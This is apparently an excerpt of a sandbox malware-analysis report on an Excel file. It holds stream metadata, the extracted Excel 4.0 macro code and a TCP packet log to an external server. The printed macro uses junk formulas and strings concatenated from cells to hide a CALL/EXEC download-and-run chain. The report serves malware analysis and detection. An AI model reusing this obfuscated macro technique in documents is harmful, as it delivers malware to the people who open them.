Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 bc 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 7b 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.2540711905
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . P . . . . . . . h . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 4 6 5 . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . \| . # . . . @ . . . . . . . , G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 88 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 50 00 00 00 0c 00 00 00 68 00 00 00 0d 00 00 00 74 00 00 00 13 00 00 00 80 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00 35 34 36 35 00 00 00 00

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 271852

General
Stream Path:	Book
File Type:	Applesoft BASIC program data, first line number 8
Stream Size:	271852
Entropy:	3.18811060737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 4 6 5 B . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . . H A L T . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . _ . . . . . . . . . . . . . . . . .
Data Raw:	09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 04 35 34 36 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

,,,,,,,,,,"=WORKBOOK.DELETE(""Sheet1"")=WORKBOOK.DELETE(""Sheet2"")=WORKBOOK.DELETE(""Sheet3"")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=""""&""""&""""&""""&""""&""""&""""&""""&""""&CALL(""U""&before.2.8.95.sheet!CZ24&before.2.8.95.sheet!CZ25&before.2.8.95.sheet!CZ26&before.2.8.95.sheet!CZ27&""n"",""UR""&before.2.8.95.sheet!DA25&before.2.8.95.sheet!DA26&before.2.8.95.sheet!DA27&Sheet3!BC38&Sheet3!BC39&Sheet3!BC40&Sheet3!BC41&Sheet3!BC42&Sheet3!BC43&Sheet3!BC44&Sheet3!BC45&Sheet3!BC46&Sheet3!BC47&Sheet3!BC48&Sheet3!BC49&Sheet3!BC50,Sheet3!BG18&Sheet3!BG19&Sheet3!BG20&Sheet3!BG21,0,Sheet3!BH18&Sheet3!BH19&Sheet3!BH20&Sheet3!BH21,Sheet3!BH28,0,0)",,,,,,,,,,,,,,,,,,,,,=GOTO(before.2.8.95.sheet!DM21),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,R,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&EXEC(""ru""&before.2.8.95.sheet!DC25&before.2.8.95.sheet!DC26&before.2.8.95.sheet!DC27&Sheet3!BD38&Sheet3!BD39&Sheet3!BD40&Sheet3!BD41&Sheet3!BH28&Sheet3!BF17&Sheet3!BF18&Sheet3!BF19&Sheet3!BF20&Sheet3!BF21&Sheet3!BE38&Sheet3!BE39)=RUN(before.2.8.95.sheet!DB8)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)",,,,,,,,"=""L""","=""L""",,"=""n""",,,,,,,,,,,,,,,,,,"=""M""","=""D""",,"=""d""",,,,,,,,,,,,,,,,,,"=""o""","=""o""",,"=""l""",,,,,,,,,,

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 18:42:55.492877960 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:55.682590008 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:55.682733059 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:55.683294058 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:55.879472971 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:55.879513025 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:55.879534006 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:55.879559040 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:55.879581928 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:55.879606009 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:55.879633904 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:55.879657984 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:55.879682064 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:55.879704952 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:55.879729986 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:55.879764080 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:55.879769087 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:55.879772902 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:55.879776001 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:55.885046005 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.070539951 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.070570946 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.070588112 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.070609093 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.070633888 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.070717096 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.070743084 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.070771933 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.070797920 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.070827007 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.070861101 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.070893049 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.070921898 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.070951939 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.070983887 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.071084023 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.071130991 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.071137905 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.071142912 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.071149111 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.071154118 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.071157932 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.071161985 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.071166992 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.076288939 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.260648966 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.260708094 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.260747910 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.260786057 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.260823965 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.260862112 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.260881901 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.260916948 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.260924101 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.260931015 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.260935068 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.260962963 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.260974884 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.261003017 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.261023045 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.261044025 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.261065006 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.261082888 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.261095047 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.261125088 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.261142015 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.261162996 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.261183977 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.261202097 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.261225939 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.261250019 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.261253119 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.261292934 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.261312962 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.261331081 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.261348963 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.261368990 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.261387110 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.261440992 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.261467934 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.261502028 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.261532068 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.261563063 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.261603117 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.261611938 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.261646032 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.261665106 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.262837887 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.266028881 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.266113043 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.451127052 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.451167107 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.451191902 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.451215982 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.451240063 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.451263905 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.451294899 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.451318979 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.451342106 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.451349974 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.451363087 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.451375961 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.451386929 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.451406956 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.451425076 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.451426983 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.451430082 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.451452017 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.451452971 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.451473951 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.451478004 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.451493025 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.451512098 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.452337027 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.452363968 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.452388048 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.452409029 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.452410936 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.452435970 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.452438116 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.452449083 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.452464104 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.452486038 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.452490091 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.452505112 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.452513933 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.452522993 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.452538013 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.452555895 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.452560902 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.452573061 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.452584028 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.452590942 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.452606916 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.452621937 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.452632904 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.452641010 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.452657938 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.452672958 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.452681065 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.452701092 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.452706099 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.452729940 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.452733994 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.452742100 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.452754021 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.452768087 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.452779055 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.452797890 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.452801943 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.452816010 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.452831984 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.452863932 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.452877045 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.453154087 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.455482006 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.455513000 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.455563068 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.455579042 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.457369089 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.640949011 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.640979052 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.640996933 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.641015053 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.641035080 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.641053915 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.641071081 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.641096115 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.641100883 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.641120911 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.641145945 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.641165972 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.641170979 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.641187906 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.641206980 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.641225100 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.641230106 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.641249895 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.641253948 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.641272068 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.641278028 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.641294956 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.641314030 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.641314983 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.641340017 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.641391039 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.642517090 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.642544031 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.642561913 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.642585039 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.642585993 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.642608881 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.642631054 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.642656088 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.642678976 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.642693043 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.642704010 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.642720938 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.642729998 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.642751932 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.642775059 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.642798901 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.642821074 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.642822027 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.642842054 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.642846107 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.642884970 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.642927885 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.642951012 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.642973900 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.642998934 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.643001080 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.643021107 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.643044949 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.643044949 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.643066883 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.643085957 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.643101931 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.643110037 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.643131971 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.643156052 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.643178940 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.643203020 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.643224001 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.643227100 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.643246889 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.643250942 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.643263102 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.643300056 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.643709898 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.646871090 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.646893978 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.646960974 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.647459030 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.649583101 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.832945108 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.832989931 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.833013058 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.833044052 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.833071947 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.833106041 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.833179951 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.833528042 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.834572077 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.834695101 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.835194111 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.835238934 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.835252047 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.835285902 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.835309029 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.835331917 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.835371017 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.835377932 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.835396051 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.835412025 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.835427999 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.835472107 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.835474014 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.835513115 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.835526943 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.835551023 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.835567951 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.835591078 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.835604906 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.835629940 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.835642099 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.835666895 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.835680962 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.835702896 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.835720062 CEST	49167	80	192.168.2.22	198.54.114.131
